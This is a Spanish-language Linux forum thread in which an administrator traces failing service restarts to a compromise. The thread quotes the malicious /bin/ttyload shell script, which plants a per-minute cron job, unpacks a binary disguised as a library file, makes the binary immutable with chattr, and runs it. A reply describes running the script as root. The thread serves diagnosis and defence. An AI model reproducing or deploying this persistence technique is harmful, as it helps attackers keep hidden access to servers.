View previous topic :: View next topic |
Author |
Message |
RazaRecords n00b
Joined: 06 Aug 2013 Posts: 12
|
Posted: Tue Oct 28, 2014 9:52 pm Post subject: Problemas con reinicio de servicios |
|
|
Hola a toda la comunidad tengo un problema que me esta sacando canas verdes y no se como solucionarlo. De un momento a otro no se como cuando reinicio algún servicio mediante el /etc/init.d/ no se da me sale un error como es el caso del servicio apache:
Quote: | PlanVital ~ # /etc/init.d/apache2 restart
* Caching service dependencies ...
head: cannot open `/tmp/.cr' for reading: No such file or directory
tail: cannot open `/tmp/.cr' for reading: No such file or directory
head: cannot open `/tmp/.cr' for reading: No such file or directory
tail: cannot open `/tmp/.cr' for reading: No such file or directory
tail: cannot open `/tmp/.cr' for reading: No such file or directory
head: cannot open `/tmp/.cr' for reading: No such file or directory
tail: cannot open `/tmp/.cr' for reading: No such file or directory
/bin/ttyload: line 3: /tmp/.cr: No such file or directory
expr: syntax error
^C * apache2: caught SIGINT, aborting
|
Y luego de eso en los log de me sale esto
Quote: | Oct 28 16:46:23 PlanVital crontab[14136]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14160]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14168]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14192]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14200]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14224]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14232]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14257]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14265]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14289]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14297]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14321]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14329]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14353]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14361]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14385]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14393]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14417]: (root) LIST (root)
Oct 28 16:46:23 PlanVital crontab[14425]: (root) REPLACE (root)
Oct 28 16:46:23 PlanVital crontab[14449]: (root) LIST (root)
|
Y dentro del crontab -e me aparece esto repetidas veces
Quote: | # DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/.crr installed on Tue Oct 28 16:51:19 2014)
# (Cron version V5.0 -- $Id: crontab.c,v 1.12 2004/01/23 18:56:42 vixie Exp $) |
No se que a pasado estoy preocupado porque ningún servicio puedo reiniciar y no se que mas hacer, su ayuda por favor. Desde ya gracias.
Saludos |
|
Back to top |
|
|
quilosaq Veteran
Joined: 22 Dec 2009 Posts: 1522
|
|
Back to top |
|
|
esteban_conde Veteran
Joined: 04 Jun 2003 Posts: 1670
|
Posted: Wed Oct 29, 2014 8:35 pm Post subject: |
|
|
Si tienes instalado y activado systemd los servicios se manejan con systemctl. _________________ Saludos a tod@s, Esteban. |
|
Back to top |
|
|
RazaRecords n00b
Joined: 06 Aug 2013 Posts: 12
|
Posted: Wed Oct 29, 2014 8:53 pm Post subject: |
|
|
Estube leyendo el post que me enviste y si parece que fuera un troyano o un ataque a mi servidor, encontre un bash ejecutandose que llamada "/bin/ttyload" y contenia esto
Quote: | #!/bin/sh
crontab -l | grep -vi "/usr/lib/httpds" > /tmp/.cr
_PNR=`wc -l < /tmp/.cr`
_PHALF=$(expr $_PNR / 2)
head -$_PHALF /tmp/.cr > /tmp/.crr
echo "* * * * * /usr/lib/httpds >/dev/null 2>&1" >> /tmp/.crr
tail -$(expr $_PNR - $_PHALF) /tmp/.cr >> /tmp/.crr
crontab /tmp/.crr
rm -rf /tmp/.cr /tmp/.crr >/dev/null 2>&1
tar -zxvf /lib/elevsq.so.1 > /dev/null 2>&1
mv -f httpds /usr/lib/ >/dev/null 2>&1
chattr +isa /usr/lib/httpds >/dev/null 2>&1 &
/usr/lib/httpds >/dev/null 2>&1 & |
Al final no pude hacerlo yo, tuve que pasar el problema al area de investigaciones de mi trabajo jeje
Pero fue de mucha ayuda tu post pude encontrar el porque me pasaba esto y ademas esto ocurrio un dia despues de que le habilite el acceso FTP a unos proovedores externos que manejan una pagina web alojada en ese servidor... algo deben haber hecho...
Si se logra solucionar posteo que se se hizo en el servidor, quizas a alguien le pueda ser de ayuda
Saludos |
|
Back to top |
|
|
esteban_conde Veteran
Joined: 04 Jun 2003 Posts: 1670
|
Posted: Thu Oct 30, 2014 10:43 am Post subject: |
|
|
Pues he copiado el código que pones en un archivo que he nombrado troyano.sh, ya ves que soy original, aunque puede que no te sirva de mucho te envío el resultado de ejecutarlo.
Como user sin permisos ni sudo resulta lo más lógico--> permiso denegado y como root:
root wrote: | localhost cron # /home/esteban/troyano.sh
no crontab for root
|
Me imagino que a ti te puede afectar más si tienes programado alguna tarea como root.
Te sugiero si quieres aprender que en un ordenador fuera del alcance de tu red ejecutes el código y vayas sacando el ovillo, es que si culpas a quien sea sin conocimiento de causa puedes hacer el ridículo y además perjudicar a un tercero sin haber solucionado el problema.
EDITO:
En una segunda lectura a tu primer post veo: Quote: | PlanVital ~ # /etc/init.d/apache2 restart
* Caching service dependencies ...
head: cannot open `/tmp/.cr' for reading: No such file or directory |
Interpreto que o bien el troyano (si es un troyano) está metido en en el ejcutable de apache2 ya que intenta leer un archivo oculto /tmp/.cr que es precisamente un archivo que deberia crear troyano.sh = "ttyload" al ejecutarse y esto nos lleva a la posibilidad de que ttyload sea un archivo que venga con la instalación de apache2, en tu caso haría un:
"equery f apache2" a ver si sale ttyload por ahí. _________________ Saludos a tod@s, Esteban. |
|
Back to top |
|
|
|